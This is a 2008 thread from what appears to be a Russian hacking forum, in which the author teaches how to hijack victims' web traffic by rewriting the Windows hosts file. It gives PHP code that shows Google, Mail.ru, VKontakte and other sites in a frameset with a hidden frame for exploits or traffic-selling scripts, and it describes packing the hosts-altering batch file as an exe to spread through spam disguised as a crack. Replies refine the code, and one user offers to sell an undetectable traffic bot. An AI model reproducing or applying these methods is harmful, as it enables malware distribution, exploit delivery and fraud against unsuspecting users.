Авторские статьи Сливаем траф через hosts

Discussion in 'Статьи' started by -=KeepeR=-, 25 Aug 2008.

  1. -=KeepeR=-

    -=KeepeR=- Banned

    Joined:
    24 Aug 2008
    Messages:
    1
    Likes Received:
    5
    Reputations:
    0
    Сливаем траф через hosts​

    В данном топике я вам покажу еще один способ получить постоянный трафик.
    Для реализации нам потребуеться хостинг с выделенным ip, либо дед с поднятым на нём денвером.
    Обьясню попорядку. После заражения, когда жертва в очередной раз будет прописывать google.com она будет пободать не google.com, а наш сервер, но самое главное что она даже небудет об этом подозревать, так как будет открываться содержимое google.com, но помимо этого в фрейме будет выполняться наш скрипт!
    Для чего это нужно вообще? Люди ежедневно посещают такие порталы как google.com mail.ru vkontakte.ru, итп; мы же будем извлекать из этого свою выгоду!
    -----------------------------------------------------------

    Для примера я буду использовать ip - 127.0.0.1, вы будете ставить вместо него ip своего сервака!
    Итак первое на чем мы остановимся это PHP скрипт(index.php) каторый будет выполнять всю основную работу(редирект и отображение нашего скрипта в фрейме).
    PHP:
    <?
    if (
    $_SERVER['HTTP_HOST'] == "mail.ru")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://194.67.57.26'>
    </frameset>
    "
    );
    }


    if (
    $_SERVER['HTTP_HOST'] == "rambler.ru")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://81.19.70.3'>
    </frameset>
    "
    );
    }


    if (
    $_SERVER['HTTP_HOST'] == "www.mail.ru")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://194.67.57.26'>
    </frameset>
    "
    );
    }


    if (
    $_SERVER['HTTP_HOST'] == "www.combats.ru")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://80.239.177.34'>
    </frameset>
    "
    );
    }

    if (
    $_SERVER['HTTP_HOST'] == "combats.ru")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://80.239.177.34'>
    </frameset>
    "
    );
    }

    if (
    $_SERVER['HTTP_HOST'] == "yandex.ru")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://www.yandex.ru'>
    </frameset>
    "
    );
    }

    if (
    $_SERVER['HTTP_HOST'] == "ya.ru")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://www.ya.ru'>
    </frameset>
    "
    );
    }


    if (
    $_SERVER['HTTP_HOST'] == "www.google.com")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://209.85.135.99'>
    </frameset>
    "
    );
    }

    if (
    $_SERVER['HTTP_HOST'] == "google.com")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://209.85.135.99'>
    </frameset>
    "
    );
    }

    if (
    $_SERVER['HTTP_HOST'] == "www.microsoft.com")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://207.46.19.190'>
    </frameset>
    "
    );
    }

    if (
    $_SERVER['HTTP_HOST'] == "microsoft.com")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://207.46.19.190'>
    </frameset>
    "
    );
    }

    if (
    $_SERVER['HTTP_HOST'] == "www.gmail.com")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://72.14.253.83'>
    </frameset>
    "
    );
    }

    if (
    $_SERVER['HTTP_HOST'] == "gmail.com")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://72.14.253.83'>
    </frameset>
    "
    );
    }

    if (
    $_SERVER['HTTP_HOST'] == "www.vkontakte.ru")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://195.190.105.240'>
    </frameset>
    "
    );
    }

    if (
    $_SERVER['HTTP_HOST'] == "vkontakte.ru")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://195.190.105.240'>
    </frameset>
    "
    );
    }

    if (
    $_SERVER['HTTP_HOST'] == "www.odnoklasniki.ru")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://81.177.141.207'>
    </frameset>
    "
    );
    }

    if (
    $_SERVER['HTTP_HOST'] == "odnoklasniki.ru")
    {
    echo(
    "
    <Frameset rows=',100%'>
    <frame src='nash_script.php'>
    <frame src='http://81.177.141.207'>
    </frameset>
    "
    );
    }
    ?>
    Где nash_script.php - страничка каторая будет открываться в невидимом фрейме, в нее Вы можете записать свой эксплоит или вставить ссылкус какойто партнерки, либо поставить ифрейм своей TDS, вобсчем это ваш трафф!
    -----------------------------------------------------------

    Теперь перейдем непосредсвенно к тому какже заставить компьютер обращаться к нашему серверу, для этого мы будем использовать .bat файл, каторый будет записовать в С:\Windows\system32\drivers\etc\hosts нужные нам строки.
    Итак создаем bat файл с таким содержимым:

    Теперь идем в гугл и качаем прогу bat2exe и компилим наш батник в ексешку!
    Все теперь распотраняем наш файл всеми известными способами, например спамом под видом крякере интерета.... Вобсчем это неважно. Главно что после того как люди запустят наш файл у себя на компе у нас появиться постоянный трафик каторым мы сможем свободно распоряжаться!

    Зы. Особо не пинайте, так как тема топика давольно боянистая, но всеже такого я нечитал негде......
     
    5 people like this.
  2. o_OBallers

    o_OBallers Banned

    Joined:
    11 Oct 2007
    Messages:
    23
    Likes Received:
    24
    Reputations:
    0
    Хорош.
    127.0.0.1 это мой ip.
    Не надо мне ничего слать.
    Мне только недавно Винду установили.
    За ваши дурацкие опыты, устал деньги насаживать за переустановку.
     
    kakawin likes this.
  3. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    лучше заменить
    PHP:
    if ($_SERVER['HTTP_HOST'] == "combats.ru")
    на
    PHP:
     if(strstr($_SERVER['HTTP_HOST'], 'combats.ru')) // и т.д
     
  4. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    много трафика с этого способа не получишь, если я правильно суть понял....
     
  5. Бобек

    Бобек Banned

    Joined:
    21 Aug 2008
    Messages:
    7
    Likes Received:
    15
    Reputations:
    1
    аналогично распространению пинча.
     
  6. o_OBallers

    o_OBallers Banned

    Joined:
    11 Oct 2007
    Messages:
    23
    Likes Received:
    24
    Reputations:
    0
    Автор статьи по всей видимости, не знаком с десктопным программированием.

    В связи с этим я хочу сделать предложение автору, и всем заинтересованным лицам.
    Я напишу бота который не будет определятся ничем.
    Который будет лить трафик каждый раз, когда компьютер подключён к сети, а не когда пользователь лезет на яндекс.
    Количество ссылок чтобы лить трафик неограниченно.

    Всё просто вам надо создать файл типа:

    www.site.org/tds.php
    www.site1.org/tds.php
    www.site2.org/tds.php
    www.site3.org/tds.php
    www.site4.org/tds.php

    Закачать его на свой сайт, и боты будут автоматически и незаметно посещать эти сайты.

    С вас сайт на платном хостинге для управления ботами, причём если вы знаете php давать мне доступ к ftp не надо, вам надо будет написать маленький скрипт для управления ботами, если вы не знаете то придётся предоставить мне доступ чтоб я мог загружать файл со списком сайтов.

    Загрузки будем делать вместе.
    Если вы не хотите со мной сотрудничать, то вы можете купить бота за очень очень скромную сумму.
    Те кто заинтересован пишите в личные сообщения.